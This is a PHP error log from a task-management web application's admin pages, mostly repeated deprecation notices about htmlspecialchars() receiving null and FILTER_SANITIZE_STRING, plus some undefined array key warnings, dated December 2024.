Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 00:11:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 00:11:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:11:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:12:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:15:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:24:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 00:32:40 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 11:20:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 11:41:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:43:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 